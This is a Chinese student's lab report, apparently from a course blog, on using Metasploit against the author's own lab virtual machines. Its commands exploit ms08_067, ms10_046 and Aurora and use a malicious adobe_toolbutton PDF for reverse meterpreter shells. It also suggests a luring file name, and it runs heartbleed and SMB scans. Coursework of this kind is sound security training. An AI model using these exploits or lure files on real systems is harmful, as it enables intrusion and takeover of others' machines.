20155339 Exp5 MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode.
答:
exploit是通过自己选择的漏洞和载荷进行攻击的一个过程。
payload是一段载荷代码,通过这段代码来运行漏洞程序进行对靶机的攻击。
encode是对攻击代码进行编码,保护其能正常运行并且改变其特征码。

实践总结与体会

这次的实践比起前面来说比较实际,但是也有很多限制条件,比如不是所有的系统都可以被攻击。

一个主动攻击实践--ms08_067漏洞

  • 调用该模块:use exploit/windows/smb/ms08_067_netapi并且查看可以使用的载荷show payloads
  • 设置payloadset payload generic/shell_reverse_tcp
  • 设置回连的IPset LHOST 192.168.224.142
  • 设置攻击的端口号set LPORT 5339
  • 设置靶机的IPset RHOST 192.168.224.144
  • 查看有哪些靶机类型show targets
  • 在这里我先选择最简单的0试试set target 0
  • 成功攻击我的靶机,使用一个ipconfig命令来进行验证。

ms10_046_shortcut_icon_dllloader漏洞

  • 学习了老师提供的漏洞,自己查看并且选择了smb里的别的漏洞,我选择了下面的漏洞。

  • 查看该模块info windows/smb/ms10_046_shortcut_icon_dllloader可以看到它可以攻击的靶机类型以及需要设置的参数。

  • 同样调用该模块:windows/smb/ms10_046_shortcut_icon_dllloader
  • 设置payload,这里我选择了meterpreter进行tcp反向回连set payload windows/meterpreter/reverse_tcp
  • 设置回连的IPset LHOST 192.168.224.142
  • 设置攻击的端口号set LPORT 5339
  • 设置本地即Kali的IPset SRVHOSTS 192.168.224.144
  • 查看生成的文件名set FILENAME 20155339.lnk
  • exploit会生成一个.lnk文件,将其拷至靶机,并点击运行,查看当前sessions,然后sessions -i idnum就可以观察到攻击机就会看到获得了靶机的shell,使用ipconfig命令来查看是不是靶机的IP,正确。

一个针对浏览器的攻击-ms10_002_aurora

  • 尝试了很多很多很多很多,很多很多很多很多次的失败之后,终于有一个可以用了,真的太不容易了。

  • 查看一下该模块info exploit/windows/browser/ms10_002_aurora,可以看出适合所有的Windows的所有版本的IE,以及需要设置的参数。

  • 设置相关参数:
    • 设置载荷set payload windows/meterpreter/reverse_tcp
    • 设置模块的参数本地IP即Kali的IPset SRVHOST 192.168.224.142
    • 设置回连的IPset LHOST 192.168.224.142
    • 设置端口set LPORT 5339
    • exploit这时候出现下图所示问题,这是端口号被占用,只需要找到占用端口的进程号,然后kill掉它就可以了;

  • 再次尝试exploit,可以看到回连成功,并且可以看到创建的会话ID号为9,运行该会话sessions -i 9,成功获得靶机的shell。

一个针对客户端的攻击——adobe_toolbutton

  • 选择漏洞,可以到/usr/share/metasploit-framework/modules/exploits/windows/fileformat目录下进行选择。

  • 尝试了好多,自己的靶机也出现如下问题,这个问题可以通过修改注册表的键值或者选择打开方式来解决。

  • 但是一直无论选择哪个都处于下图所示状态。

  • 换了一台靶机,再次尝试终于成功了。

  • 最后我选择的是adobe_toolbutton,首先查看其模块信息info windows/fileformat/adobe_toolbutton

  • 该模块需要设置的参数只有文件名称,使用该模块use windows/fileformat/adobe_toolbutton选择载荷set payload windows/meterpreter/reverse_tcp,设置载荷需要的参数:set LHOST 192.168.224.142、设置端口set LPORT 5339exploit,设置我的文件名set FILENAME 20155339.pdf文件名可以设的有诱惑性一些,比如毕业晚会安排,exploit会生成我的PDF文档并且显示其路径,按照路径找到该文件夹或者用cp复制到自己实验的文件夹下,注意按路径找的时候需要将隐藏的文件夹设置为可见模,将该PDF文档拷至我的靶机。

  • 攻击机开启监听use exploit/multi/handlerset LHOST 192.168.224.142set LPORT 5339,靶机上双击我的PDF,攻击机连接成功,测试一下ipconfig命令。

辅助模块——openssl_heartbleed、smb_version

openssl_heartbleed

  • 首先对漏洞进行选择,最后选择了openssl的heartbleed漏洞,首先OpenSSL是非常耳熟能详的开源的SSL,数据加密协议代码其中的漏洞的确是让人害怕。OpenSSL Heartbleed模块存在一个BUG,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的openssl服务器内存中长达64K的数据。
  • 首先查看一下该模块:info scanner/ssl/openssl_heartbleed
  • 使用该模块:use scanner/ssl/openssl_heartbleed
  • 设置相关参数:set RHOSTS 192.168.224.144,此处我没有设置IP段的范围直接确定了我的靶机;设置线程数set THREADS 50;其他参数我选择了默认值,run

  • 运行成功但是我的靶机应该是没有使用OpenSSL的服务,这类可以选择下载并且安装OpenSSL,考虑了我的计算机可能会出现的非主流问题,这类就不花大的时间安装配置它了。尝试一下更多的IP,set RHOSTS 192.168.224.0-192.168.224.0,exploit

  • 依旧是运行成功,没有发现开启该功能的主机,进行别的尝试。

smb_version

  • 使用该模块use auxiliary/scanner/smb/smb_version
  • 查看它需要什么参数show options

  • 设置靶机的IP范围set RHOSTS 192.168.224.144,设置线程数set THREADS 100exploit,成功,可以看到我们的靶机的型号。

  • 再开启我的另一个XP客户机,修改范围set RHOSTS 192.168.224.0-149exploit

  • 可以看到我的两个靶机的版本号。

20155339 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

  1. Lambda表达式 For Android

    Lambda简介 A lambda expression is a block of code with parameters. lambda表达式是带参数的代码块. 虽然看着很先进,其实Lambda ...

  2. smarty详细使用教程(韩顺平smarty模板技术笔记)

    MVC是一种开发模式,强调数据的输入.处理.显示是强制分离的 Smarty使用教程1.如何配置我们的smarty解压后把libs文件夹放在网站第一级目录下,然后创建两个文件夹templates 存放模 ...

  3. sklearn——数据集调用及应用

    忙了许久,总算是又想起这边还没写完呢. 那今天就写写sklearn库的一部分简单内容吧,包括数据集调用,聚类,轮廓系数等等.   自带数据集API 数据集函数 中文翻译 任务类型 数据规模 load_ ...

  4. CAC的Debian-8-64bit安装BBR正确方式是?

    裝过三台debian 64 bit, CAC, 2歐, KVM虛擬機 做法都一樣 0. 有裝銳速記得先刪除, 免得換核心後, 銳速在扯後腿 1.換4.9版kernel 有正式版 別裝啥rc版, 4.9 ...

  5. 4种更快更简单实现Python数据可视化的方法

    数据可视化是数据分析或机器学习项目中十分重要的一环.通常,你需要在项目初期进行探索性的数据分析(EDA),从而对数据有一定的了解,而且创建可视化确实可以使分析的任务更清晰.更容易理解,特别是对于大规模 ...

  6. October 10th 2017 Week 41st Tuesday

    If you focus on what you left behind you will never see what lies ahead. 如果你只顾回头看,那么你永远也看不见前方有什么. Ye ...

  7. SDN2017 第四次实验作业

    实验目的 1.使用图形化界面搭建拓扑如下并连接控制器 2.使用python脚本搭建拓扑如下并通过命令行连接控制器 3.使用任一种方法搭建拓扑连接控制器后下发流表 实验步骤 建立以下拓扑,并连接上ODL ...

  8. JFreeChart绘制XY折线图(工具类设计)

    准备用Java写通信的仿真平台作为毕业设计,相比matlab绘图,Java绘图需要自己去写很多工具类,博主在这采用了JFreeChart的开源解决方案,摸索着自己写了一个XY折线图工具类,话不多说贴源 ...

  9. swift static与class修饰符:static不参与动态派发

    static与class 都有类型成员的含义:相对于实例成员: static的另一个意思是静态派发:所以不能被继承. 要使用动态派发和继承的机制必须使用class继承. static的其它常见含义: ...

  10. Linux之Vim学习

    Linux之Vim学习 一般模式 光标移动 按键 作用 j或down方向键 向下移动一个字符 k或up方向键 向上移动一个字符 h或left方向键 向左移动一个字符 l或right方向键 向右移动一个 ...